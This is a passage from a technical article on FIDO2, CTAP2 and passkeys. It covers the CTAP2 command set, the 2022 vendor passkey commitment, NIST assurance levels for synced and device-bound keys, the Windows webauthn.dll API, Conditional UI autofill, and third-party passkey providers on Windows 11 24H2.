The Client-to-Authenticator Protocol -- the wire format the browser speaks to a roaming authenticator over USB-HID, NFC, or BLE. CTAP1 (the original U2F messages) carries APDU-style binary structures; CTAP2 carries CBOR-encoded commands. A *CTAP2 authenticator* (also called a FIDO2 or WebAuthn authenticator) implements the CTAP2 command set; modern keys also implement CTAP1 for backwards compatibility [@ctap-2-0-ps].
&lt;p&gt;The CTAP2 command-byte table is the surface a browser actually dispatches to. Each command is a single byte followed by a CBOR-encoded request map. The table below names the commands in order and the criterion-table cell each one strengthens.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Command byte&lt;/th&gt;
&lt;th&gt;Command name&lt;/th&gt;
&lt;th&gt;What it does&lt;/th&gt;
&lt;th&gt;Criterion strengthened&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;0x01&lt;/td&gt;
&lt;td&gt;&lt;code&gt;authenticatorMakeCredential&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Registration: generate a fresh keypair bound to &lt;code&gt;(rpId, user.id)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Phishing resistance (origin binding)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;0x02&lt;/td&gt;
&lt;td&gt;&lt;code&gt;authenticatorGetAssertion&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Authentication: sign the challenge with the credential&apos;s private key&lt;/td&gt;
&lt;td&gt;Phishing + replay + verifier-compromise&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;0x04&lt;/td&gt;
&lt;td&gt;&lt;code&gt;authenticatorGetInfo&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Capability discovery: list supported algorithms, extensions, transports, &lt;code&gt;UV&lt;/code&gt; modes&lt;/td&gt;
&lt;td&gt;Step-up (lets RP know what&apos;s available)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;0x06&lt;/td&gt;
&lt;td&gt;&lt;code&gt;authenticatorClientPIN&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Manage the PIN, issue &lt;code&gt;pinUvAuthToken&lt;/code&gt; with permissions bitmap and &lt;code&gt;rpId&lt;/code&gt; scoping&lt;/td&gt;
&lt;td&gt;Step-up + replay&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;0x07&lt;/td&gt;
&lt;td&gt;&lt;code&gt;authenticatorReset&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Wipe all resident credentials on the device&lt;/td&gt;
&lt;td&gt;Lifecycle&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;0x09&lt;/td&gt;
&lt;td&gt;&lt;code&gt;authenticatorBioEnrollment&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;On-token fingerprint enrolment (CTAP 2.1)&lt;/td&gt;
&lt;td&gt;Step-up (&lt;code&gt;UV=1&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;0x0A&lt;/td&gt;
&lt;td&gt;&lt;code&gt;authenticatorCredentialManagement&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;List, enumerate, and delete resident credentials per RP&lt;/td&gt;
&lt;td&gt;Lifecycle / recovery&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;0x0B&lt;/td&gt;
&lt;td&gt;&lt;code&gt;authenticatorSelection&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&quot;Pick this device&quot; prompt when multiple authenticators are present&lt;/td&gt;
&lt;td&gt;UX (no criterion change)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;0x0C&lt;/td&gt;
&lt;td&gt;&lt;code&gt;authenticatorLargeBlobs&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Per-credential blob store under the credential&lt;/td&gt;
&lt;td&gt;Step-up (extension data)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;0x0D&lt;/td&gt;
&lt;td&gt;&lt;code&gt;authenticatorConfig&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Enable enterprise attestation, toggle &lt;code&gt;alwaysUv&lt;/code&gt;, set minimum PIN length&lt;/td&gt;
&lt;td&gt;Verifier-compromise + lifecycle&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Three pieces of CTAP 2.1 are worth pulling out because they meaningfully change the criteria-table cells.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;pinUvAuthToken&lt;/code&gt; and permissions.&lt;/strong&gt; CTAP 2.0&apos;s PIN-protocol let the browser obtain a &lt;code&gt;pinAuthToken&lt;/code&gt; and use it across any command. CTAP 2.1 introduced a &lt;em&gt;permissions bitmap&lt;/em&gt; and &lt;em&gt;rpId scoping&lt;/em&gt; on the token so that a token issued for &lt;em&gt;one&lt;/em&gt; relying party&apos;s ceremony cannot be replayed against a different relying party&apos;s ceremony on the same authenticator [@ctap-2-1-ps]. This closes a class of host-side mischief: an attacker who got the PIN out of one ceremony could not previously be stopped from spending it on a different &lt;code&gt;rpId&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;credProtect&lt;/code&gt;.&lt;/strong&gt; A new extension that lets the RP request a higher protection level on the resident credential -- specifically, that the authenticator should refuse to list the credential without a &lt;code&gt;UV=1&lt;/code&gt; gesture. The first generation of WebAuthn discoverable credentials were enumerable by any host that could speak CTAP2 to the connected key; &lt;code&gt;credProtect&lt;/code&gt; lets the RP say &quot;don&apos;t show this credential&apos;s existence to anything that doesn&apos;t pass user verification first.&quot;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Enterprise attestation.&lt;/strong&gt; CTAP 2.1 added an explicit &lt;em&gt;enterprise attestation&lt;/em&gt; mode in which the authenticator binds its attestation statement to a list of relying parties the device&apos;s enrolling organisation has pre-approved. This is the bridge that makes vendor attestation useful in managed enterprises without leaking the user&apos;s specific device identity to every relying party.The largeBlob extension (CTAP 2.1, command 0x0C) gives each credential a small per-credential blob store. RPs use it for things like cached short-lived tokens or per-user policy. The 2024 release notes for the Windows &lt;code&gt;webauthn.dll&lt;/code&gt; API surface flagged largeBlob support as one of the additions in Windows 11 22H2 [@ms-learn-webauthn-apis]; a March 2023 Review Draft [@ctap-2-2-rd] foreshadowed the 2.2 refinements that landed in July 2025.&lt;/p&gt;
&lt;p&gt;All of this is for experts. When did this stop being a security-team conversation and start being a consumer product? What changed in May 2022?&lt;/p&gt;
&lt;h2&gt;7. Passkeys: the productisation moment&lt;/h2&gt;
&lt;p&gt;5 May 2022. Apple, Google, and Microsoft jointly committed at the FIDO Alliance to a common passwordless sign-in standard [@fido-aav-passkey-commitment]. The press release is short on protocol detail and long on user-facing language. The headline commitment, verbatim: &quot;Allow users to automatically access their FIDO sign-in credentials (referred to by some as a &apos;passkey&apos;) on many of their devices, even new ones, without having to reenroll every account&quot; [@fido-aav-passkey-commitment]. &lt;em&gt;Passkey&lt;/em&gt; entered the public lexicon. Andrew Shikiar, the FIDO Alliance&apos;s executive director and CMO at the time, named it in the press call.&lt;/p&gt;

Allow users to automatically access their FIDO sign-in credentials (referred to by some as a &apos;passkey&apos;) on many of their devices, even new ones, without having to reenroll every account. -- Apple, Google, and Microsoft, joint FIDO Alliance announcement, 5 May 2022 [@fido-aav-passkey-commitment]
&lt;p&gt;The &lt;em&gt;cryptographic&lt;/em&gt; move in May 2022 was small. The protocol bytes are the same FIDO2 / WebAuthn / CTAP2 bytes that shipped in March 2019. What changed was twofold: (a) the three platform vendors aligned their sync fabrics so that a passkey created on a user&apos;s phone would appear on the user&apos;s laptop, and (b) the user-facing terminology consolidated from a confusing menagerie (&quot;discoverable credential,&quot; &quot;resident key,&quot; &quot;client-side discoverable credential&quot;) onto a single product term -- &lt;em&gt;passkey&lt;/em&gt;.&lt;/p&gt;

A WebAuthn credential whose `user.id` and account metadata are stored *on the authenticator*, so the authenticator can produce an assertion without the relying party first supplying a credential identifier. The CTAP 2.0 spec calls these *resident keys* [@ctap-2-0-ps]; the WebAuthn Level 2 spec calls them *client-side discoverable credentials* [@webauthn-l2-latest]; the May 2022 vendor commitment rebranded them as *passkeys* [@fido-aav-passkey-commitment]. All three terms refer to the same on-the-wire object.
&lt;p&gt;Discoverable credentials unlock &lt;em&gt;usernameless&lt;/em&gt; sign-in. The relying party does not need to tell the authenticator which credential to use; the authenticator looks up its own resident credentials for the supplied &lt;code&gt;rpId&lt;/code&gt;, shows the user the matching account, and asks for the user-verification gesture. This is the UX primitive every consumer-passkey flow leans on.&lt;/p&gt;
&lt;p&gt;WebAuthn Level 3 (W3C Candidate Recommendation, latest snapshot dated 13 January 2026 [@webauthn-l3-cr] [@webauthn-l3-cr-dated]) is the spec generation that productises passkeys. Level 3 standardises:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;strong&gt;hybrid transport&lt;/strong&gt; (formerly known as caBLE), exposed as the &lt;code&gt;hybrid&lt;/code&gt; value of WebAuthn&apos;s &lt;code&gt;AuthenticatorTransport&lt;/code&gt; enumeration (L3 §5.8.4) with the handshake protocol specified in FIDO CTAP 2.2, which lets a phone act as a roaming authenticator for a nearby laptop via QR code plus ephemeral ECDH plus BLE proximity. We cover hybrid in §12.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;JSON-serialisation helpers&lt;/strong&gt; -- &lt;code&gt;PublicKeyCredentialCreationOptionsJSON&lt;/code&gt; and &lt;code&gt;PublicKeyCredentialRequestOptionsJSON&lt;/code&gt; -- that make WebAuthn easier to drive from a server SDK without manual base64url juggling.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;getClientCapabilities()&lt;/code&gt;&lt;/strong&gt; so the relying party can probe what the client supports before issuing the ceremony.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;&lt;code&gt;credProps&lt;/code&gt;&lt;/strong&gt;, &lt;strong&gt;&lt;code&gt;prf&lt;/code&gt;&lt;/strong&gt;, and &lt;strong&gt;&lt;code&gt;largeBlob&lt;/code&gt;&lt;/strong&gt; client extensions (plus the CTAP-level &lt;strong&gt;&lt;code&gt;credProtect&lt;/code&gt;&lt;/strong&gt;), and the sibling &lt;strong&gt;Secure Payment Confirmation&lt;/strong&gt; specification, each of which sharpens one cell of the criteria table.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The mid-2025 cadence picked up: CTAP 2.2 Proposed Standard on 14 July 2025 [@ctap-2-2-ps] refined hybrid-transport semantics and tightened &lt;code&gt;credProtect&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The synced-vs-bound distinction is the structural new thing about passkeys. Before May 2022 a FIDO2 credential lived in one secure element; lose the YubiKey, lose the credential. Synced passkeys put the private key into a sync fabric -- Apple iCloud Keychain (originally 2013) [@wiki-icloud], Google Password Manager (Chrome password sync, late 2000s onward), Microsoft Authenticator (originally 2015) [@wiki-ms-authenticator], and Microsoft Account passkey sync (general availability for consumer accounts on 2 May 2024) [@ms-security-passkeys-consumer] -- and let it appear on every device the user signs into. The mechanism is end-to-end encryption against a sync-fabric key that the platform vendor cannot read; Apple&apos;s Advanced Data Protection model is the strongest current public realisation [@apple-adp-kb].&lt;/p&gt;
&lt;p&gt;The price: the long-term private key has &lt;em&gt;left&lt;/em&gt; the original authenticator. NIST is unambiguous about the consequence. The April 2024 supplement &lt;em&gt;Incorporating Syncable Authenticators into NIST SP 800-63B&lt;/em&gt; [@sp80063sup1] -- since absorbed into NIST SP 800-63B-4 final, July 2025 [@sp80063b4-html] -- classifies synced passkeys at AAL2, not AAL3, because the key is no longer pinned to a single tamper-resistant element. Yubico&apos;s commentary captures the dichotomy verbatim: &quot;FIDO passkeys that are not synced -- device-bound passkeys like YubiKeys -- and are properly stored in dedicated hardware have an AAL3 rating&quot; [@yubico-nist-guidance].&lt;/p&gt;
&lt;p&gt;The WebAuthn spec made the distinction &lt;em&gt;observable&lt;/em&gt;. Two new flag bits in &lt;code&gt;authenticatorData&lt;/code&gt; -- &lt;code&gt;BE&lt;/code&gt; (Backup Eligible) and &lt;code&gt;BS&lt;/code&gt; (Backup State) -- tell the relying party whether the credential is in principle syncable (&lt;code&gt;BE=1&lt;/code&gt;) and whether it is currently backed up (&lt;code&gt;BS=1&lt;/code&gt;) [@webauthn-l3-cr]. The RP can decide policy from those flags: a banking RP can require &lt;code&gt;BE=0&lt;/code&gt; (device-bound) credentials for AAL3 transactions, while accepting &lt;code&gt;BS=1&lt;/code&gt; (synced) credentials for AAL2 sign-in.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s own numbers tell the productisation story in raw counts. The May 2024 Microsoft Security blog announcing passkey support for consumer accounts notes that Microsoft was &quot;detecting around 115 password attacks per second&quot; when Windows Hello first shipped in 2015; &quot;less than a decade later, that number has surged 3,378% to more than 4,000 password attacks per second&quot; [@ms-security-passkeys-consumer]. The 1 May 2025 World Passkey Day post escalates again: &quot;we observed a staggering 7,000 password attacks per second (more than double the rate from 2023). [...] now we see nearly a million passkeys registered every day.&quot; It also reports that &quot;passkey sign-ins are eight times faster than a password and multifactor authentication,&quot; and that &quot;more than 99% of people who sign into their Windows devices with their Microsoft account do so using Windows Hello&quot; [@ms-security-world-passkey-day].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Passkeys are not a new cryptographic primitive. They are a productisation moment in which discoverable credentials became consumer-grade UX. The protocol moves were two years earlier; the product move is what changed the criteria-table scoreboard.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Passkeys are a &lt;em&gt;productisation&lt;/em&gt; moment. On Windows specifically, what does the platform actually do between &lt;code&gt;navigator.credentials.create&lt;/code&gt; and the TPM?&lt;/p&gt;
&lt;h2&gt;8. The Windows platform authenticator: &lt;code&gt;webauthn.dll&lt;/code&gt; end-to-end&lt;/h2&gt;
&lt;p&gt;May 2019. Windows 10 version 1903. The Win32 platform WebAuthn API shipped, and from that moment on every browser and every native application on Windows that wants to do WebAuthn calls &lt;code&gt;webauthn.dll&lt;/code&gt;. The header file &lt;code&gt;webauthn.h&lt;/code&gt; is in the Windows SDK and is also published on GitHub at &lt;code&gt;github.com/microsoft/webauthn&lt;/code&gt; [@github-ms-webauthn]. The reference page on Microsoft Learn enumerates every function the API surfaces [@ms-learn-win32-webauthn]. The 1903 ship date and the subsequent feature additions are documented verbatim by Microsoft Learn: &quot;Microsoft has long been a proponent of passwordless authentication, and has introduced the W3C/Fast IDentity Online 2 (FIDO2) Win32 WebAuthn platform APIs in Windows 10 (version 1903). Starting in &lt;strong&gt;Windows 11, version 22H2&lt;/strong&gt;, WebAuthn APIs support ECC algorithms and starting in &lt;strong&gt;Windows 11 version 24H2&lt;/strong&gt; WebAuthn APIs support plugin passkey managers&quot; [@ms-learn-webauthn-apis].&lt;/p&gt;

When these APIs are in use, Windows 10 browsers or applications don&apos;t have direct access to the FIDO2 transports for FIDO-related messaging. -- Microsoft Learn, *WebAuthn APIs for password-less authentication on Windows* [@ms-learn-webauthn-apis]
&lt;p&gt;That sentence is the entire architectural premise. The OS dispatches FIDO2 ceremonies. The browser does not own the CTAP2 stack, the USB-HID transport, the NFC reader, the BLE pairing, or the Hello UV gesture. It hands &lt;code&gt;webauthn.dll&lt;/code&gt; a request and gets back an assertion.&lt;/p&gt;
&lt;p&gt;The API surface is a small set of functions. The ceremony surface is two functions, the management surface is the remainder.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WebAuthNAuthenticatorMakeCredential&lt;/code&gt;&lt;/strong&gt; -- the registration entry point. Caller supplies origin / &lt;code&gt;rpId&lt;/code&gt; / user / algorithms / attestation preference / authenticator-selection criteria. Returns an attestation object.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WebAuthNAuthenticatorGetAssertion&lt;/code&gt;&lt;/strong&gt; -- the authentication entry point. Caller supplies origin / &lt;code&gt;rpId&lt;/code&gt; / allowed credential IDs (or empty for usernameless) / user-verification preference / mediation (Conditional UI, see §9). Returns an assertion.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WebAuthNGetApiVersionNumber&lt;/code&gt;&lt;/strong&gt; -- a monotonically increasing integer that lets callers feature-detect. Version 1 is Windows 10 1903; versions step up as Windows adds ECC algorithms (22H2), the plugin model (24H2), and the EXPERIMENTAL_*2 surface (Insider builds via KB5072046 [@github-ms-webauthn]).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WebAuthNGetCancellationId&lt;/code&gt;&lt;/strong&gt; / &lt;strong&gt;&lt;code&gt;WebAuthNCancelCurrentOperation&lt;/code&gt;&lt;/strong&gt; -- cooperative cancellation; the browser asks &lt;code&gt;webauthn.dll&lt;/code&gt; to drop the active ceremony.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WebAuthNGetPlatformCredentialList&lt;/code&gt;&lt;/strong&gt; / &lt;strong&gt;&lt;code&gt;WebAuthNDeletePlatformCredential&lt;/code&gt;&lt;/strong&gt; -- resident-credential management for synced passkeys held by the OS provider.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WebAuthNIsUserVerifyingPlatformAuthenticatorAvailable&lt;/code&gt;&lt;/strong&gt; -- the &lt;code&gt;isUVPAA&lt;/code&gt; capability probe; the RP uses this to decide whether to offer a passkey enrolment flow at all.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WebAuthNFreeAssertion&lt;/code&gt;&lt;/strong&gt; / &lt;strong&gt;&lt;code&gt;WebAuthNFreeCredentialAttestation&lt;/code&gt;&lt;/strong&gt; / &lt;strong&gt;&lt;code&gt;WebAuthNFreePlatformCredentialList&lt;/code&gt;&lt;/strong&gt; -- caller-side memory release; the OS allocates on the heap and the caller is responsible for &lt;code&gt;Free&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WebAuthNGetErrorName&lt;/code&gt;&lt;/strong&gt; / &lt;strong&gt;&lt;code&gt;WebAuthNGetW3CExceptionDOMError&lt;/code&gt;&lt;/strong&gt; -- translate the Win32 &lt;code&gt;HRESULT&lt;/code&gt; into a WebAuthn-spec error string.&lt;/li&gt;
&lt;/ul&gt;

flowchart TD
    A[Browser or native app] --&amp;gt; B[webauthn.dll: WebAuthNAuthenticatorMakeCredential]
    B --&amp;gt; C[Windows Hello UI: prompt for PIN, fingerprint, or face]
    C --&amp;gt; D[Windows Hello / Hello for Business: verify gesture]
    D --&amp;gt; E[CNG NCRYPT: keypair generation request]
    E --&amp;gt; F[TPM 2.0: generate keypair inside the TPM]
    F --&amp;gt; G[TPM 2.0: TPM2_Certify over the new credential public key]
    G --&amp;gt; H[webauthn.dll: build attestation object with packed or tpm format]
    H --&amp;gt; B
    B --&amp;gt; A
    A --&amp;gt; I[Relying party: verify attestation, store credential public key]
&lt;p&gt;The criteria-framework consequence of that call graph is that &lt;em&gt;the private key never leaves the TPM&lt;/em&gt;. Microsoft Learn states the property verbatim: &quot;The private keys can only be used after they&apos;re unlocked by the user using the Windows Hello unlock factor (biometrics or PIN)&quot; [@ms-learn-passkeys]. The TPM enforces use through its own access-control rules; even kernel malware on the host cannot exfiltrate the raw private key, only request operations gated on the user&apos;s gesture. This is what gets a Windows-platform-bound passkey on a TPM to AAL3 even when synced passkeys are bounded at AAL2.&lt;/p&gt;
&lt;p&gt;The API version sentinel tells a clean feature-evolution story.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Windows release&lt;/th&gt;
&lt;th&gt;API version (approx.)&lt;/th&gt;
&lt;th&gt;Notable additions&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Windows 10 1903 (May 2019)&lt;/td&gt;
&lt;td&gt;v1&lt;/td&gt;
&lt;td&gt;Initial Win32 surface: make/get credential, isUVPAA&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows 10 1909 / 20H1&lt;/td&gt;
&lt;td&gt;v2&lt;/td&gt;
&lt;td&gt;UV preference, signal-handling refinements&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows 11 21H2 (Oct 2021)&lt;/td&gt;
&lt;td&gt;v3&lt;/td&gt;
&lt;td&gt;Hybrid transport (caBLE) entrypoints&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows 11 22H2 (Sep 2022)&lt;/td&gt;
&lt;td&gt;v4-v5&lt;/td&gt;
&lt;td&gt;ECC algorithms (ECDSA P-256 platform credentials), Conditional UI mediation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows 11 23H2 (Oct 2023)&lt;/td&gt;
&lt;td&gt;v6&lt;/td&gt;
&lt;td&gt;largeBlob, credProps, refined cancellation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows 11 24H2 (Oct 2024)&lt;/td&gt;
&lt;td&gt;v7&lt;/td&gt;
&lt;td&gt;Plug-in passkey managers (&lt;code&gt;WebAuthNPlugin*&lt;/code&gt;), redesigned Hello UX&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Insider builds (KB5072046)&lt;/td&gt;
&lt;td&gt;v7+&lt;/td&gt;
&lt;td&gt;EXPERIMENTAL_WebAuthNPluginAddAuthenticator2, EXPERIMENTAL_WebAuthNPluginPerformUserVerification2, EXPERIMENTAL_WebAuthNPluginUpdateAuthenticatorDetails2 [@github-ms-webauthn]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The three &lt;code&gt;EXPERIMENTAL_*2&lt;/code&gt; APIs in &lt;code&gt;github.com/microsoft/webauthn&lt;/code&gt; are Insider-only and will lose the &lt;code&gt;EXPERIMENTAL_&lt;/code&gt; prefix as they stabilise. The naming convention is the standard Windows SDK signal for &quot;we want feedback before this becomes load-bearing public API.&quot;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; On Windows, do not roll your own CTAP2 stack. &lt;code&gt;webauthn.dll&lt;/code&gt; handles USB-HID, NFC, BLE, hybrid transport, Conditional UI, plug-in dispatch, and Windows Hello user verification in a single call. The Win32 reference at &lt;code&gt;learn.microsoft.com/en-us/windows/win32/api/webauthn/&lt;/code&gt; is the source of truth, the header file is at &lt;code&gt;github.com/microsoft/webauthn&lt;/code&gt;, and the YubiKey 5 series [@yubikey5-overview] plus the Entra-listed FIDO2 vendors [@ms-entra-fido2-hardware] are the supported keys.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The criterion-table consequence of dispatching FIDO2 through one OS surface is that &lt;em&gt;every browser is automatically as strong as the OS&lt;/em&gt;. Edge does not need its own attestation logic; neither does Chrome, Firefox, or Brave. They all call the same &lt;code&gt;webauthn.dll&lt;/code&gt;, which routes the registration to the TPM (for platform-bound passkeys), to USB-HID (for roaming security keys), or to a plug-in (for Windows 11 24H2 third-party providers, §10).&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;webauthn.dll&lt;/code&gt; surface answers one half of the question. The other half is: what does the user actually &lt;em&gt;see&lt;/em&gt;?&lt;/p&gt;
&lt;p&gt;{`
// Origin binding is computationally trivial. The value is in the binding,
// not the cryptography. This snippet computes SHA-256 of an origin&apos;s
// effective rpId and compares against the rpIdHash a real authenticator
// would have signed. Paste in a clientDataJSON.origin and the
// authenticatorData.rpIdHash from the earlier snippet to verify.&lt;/p&gt;
&lt;p&gt;async function rpIdHash(rpId) {
  const enc = new TextEncoder().encode(rpId);
  const hash = await crypto.subtle.digest(&quot;SHA-256&quot;, enc);
  return Array.from(new Uint8Array(hash)).map(b =&amp;gt; b.toString(16).padStart(2,&apos;0&apos;)).join(&apos;&apos;);
}&lt;/p&gt;
&lt;p&gt;(async () =&amp;gt; {
  const goodOrigin = &quot;login.microsoftonline.example&quot;;
  const badOrigin  = &quot;login-microsoft0nline.example&quot;;
  const goodRpId   = &quot;login.microsoftonline.example&quot;;
  const badRpId    = &quot;login-microsoft0nline.example&quot;;
  console.log(&quot;rpIdHash(&quot;, goodRpId, &quot;) =&quot;, await rpIdHash(goodRpId));
  console.log(&quot;rpIdHash(&quot;, badRpId,  &quot;) =&quot;, await rpIdHash(badRpId));
  // The two hashes differ in every byte. A passkey registered against
  // login.microsoftonline.example cannot be induced to sign for the look-alike
  // because the authenticator computes the second hash from clientDataJSON.origin
  // and refuses to use the credential bound to the first one.&lt;/p&gt;
&lt;p&gt;  // Replay resistance illustration: a signCount of 0x10 followed by 0x0F
  // is illegal (counter regressed). RPs reject this for BS=0 credentials.
  const oldCount = 0x10, newCount = 0x0F;
  console.log(&quot;signCount regression (BS=0)?&quot;, newCount &amp;lt;= oldCount ? &quot;REJECT&quot; : &quot;ACCEPT&quot;);
})();
`}&lt;/p&gt;
&lt;h2&gt;9. Conditional UI: passkey autofill that looks like password autofill&lt;/h2&gt;
&lt;p&gt;The bridge between users&apos; password-trained mental model and the new asymmetric-crypto reality is a UX primitive called Conditional Mediation -- the spec name -- or &lt;em&gt;Conditional UI&lt;/em&gt; in informal use. The relying party renders a normal-looking username field. The browser sees that the page has called &lt;code&gt;navigator.credentials.get({mediation: &quot;conditional&quot;, publicKey: {...}})&lt;/code&gt; and quietly offers the user&apos;s passkey as one of the autofill suggestions, alongside whatever the user has typed and whatever the password manager remembers. The user clicks the passkey suggestion, completes a Windows Hello gesture, and they are signed in. No popup. No modal. No &quot;do you want to use a passkey?&quot; dialog.&lt;/p&gt;

A WebAuthn invocation mode in which the browser offers the user&apos;s discoverable credentials *inside* the same autofill UI it uses for saved passwords, rather than via a modal credential picker. The relying party calls `navigator.credentials.get({mediation: &quot;conditional&quot;, publicKey: {...}})`; the browser silently consults the platform authenticator (and, on Windows 11 24H2, the plug-in passkey providers) for credentials matching the `rpId`. The capability is probed via `PublicKeyCredential.isConditionalMediationAvailable()` [@webauthn-l3-cr].
&lt;p&gt;The canonical engineer-perspective walkthrough is Adam Langley&apos;s &lt;em&gt;Passkeys&lt;/em&gt; post on imperialviolet.org, dated 22 September 2022 [@imperialviolet-passkeys]. Langley walks the flag-page invocation needed on early Chrome Canary builds -- &lt;code&gt;chrome://flags#webauthn-conditional-ui&lt;/code&gt; -- and the capability surface: &lt;code&gt;isUserVerifyingPlatformAuthenticatorAvailable()&lt;/code&gt; to decide whether to offer enrolment, &lt;code&gt;isConditionalMediationAvailable()&lt;/code&gt; to decide whether to render the autofill hint at all. The post is the first time most working engineers saw what passkeys would actually look like at the page level.&lt;/p&gt;
&lt;p&gt;On Windows the browser calls &lt;code&gt;WebAuthNAuthenticatorGetAssertion&lt;/code&gt; with the Conditional mediation flag set; &lt;code&gt;webauthn.dll&lt;/code&gt; consults its resident credential store, finds passkeys matching the &lt;code&gt;rpId&lt;/code&gt;, and surfaces a small in-line affordance for each. The full-screen Windows Hello modal becomes a small in-place gesture acquisition. From the user&apos;s perspective the password-manager metaphor is unchanged; from the cryptography&apos;s perspective the work product is a public-key signature over an origin-bound challenge.&lt;/p&gt;
&lt;p&gt;The L3 spec section 5.1.4 is the normative reference for the mediation modes [@webauthn-l3-cr]. The four modes are: &lt;code&gt;silent&lt;/code&gt; (no user interaction), &lt;code&gt;optional&lt;/code&gt; (browser decides), &lt;code&gt;conditional&lt;/code&gt; (autofill), and &lt;code&gt;required&lt;/code&gt; (modal). Conditional is the one that makes passkeys feel like passwords -- and that is precisely why it took the consumer-passkey rollout off the security-team conversation and into product reviews.&lt;/p&gt;
&lt;p&gt;The Microsoft Learn passkey overview ties the UX to the Windows ship vehicle: &quot;Starting in Windows 11, version 22H2 with KB5030310, Windows provides a native experience for passkey management&quot; [@ms-learn-passkeys]. The Settings -&amp;gt; Accounts -&amp;gt; Passkeys page is the management UI; Conditional Mediation surfaces those passkeys at sign-in time. The passkeys.dev developer directory [@passkeys-dev] is the FIDO Alliance&apos;s collected resource for relying parties implementing the flow.&lt;/p&gt;
&lt;p&gt;The UX implication is the one Adam Langley underlined in the September 2022 post: the password-autofill metaphor is the load-bearing UX primitive that makes passkeys consumer-ready. The cryptography was solved in 2014. The UX took eight more years.&lt;/p&gt;
&lt;p&gt;But what if the user&apos;s passkey lives in 1Password or Bitwarden, not in Windows itself?&lt;/p&gt;
&lt;h2&gt;10. The Windows 11 24H2 third-party passkey provider model&lt;/h2&gt;
&lt;p&gt;8 October 2024. Microsoft published the Windows Developer Blog post &lt;em&gt;Passkeys on Windows: authenticate seamlessly with passkey providers&lt;/em&gt; [@ms-windev-passkeys-blog] as a pre-conference announcement ahead of the FIDO Alliance&apos;s Authenticate 2024 conference (14-16 October 2024 in Carlsbad, California). The post announced three deliverables: &quot;1. A plug-in model for third-party passkey providers. 2. Enhanced native UX for passkeys. 3. A Microsoft synced passkey provider.&quot; 1Password and Bitwarden were the named launch partners; Dashlane joined the roster shortly thereafter. The post says verbatim: &quot;Microsoft is partnering closely with 1Password, Bitwarden and others on integrating this capability&quot; [@ms-windev-passkeys-blog].&lt;/p&gt;
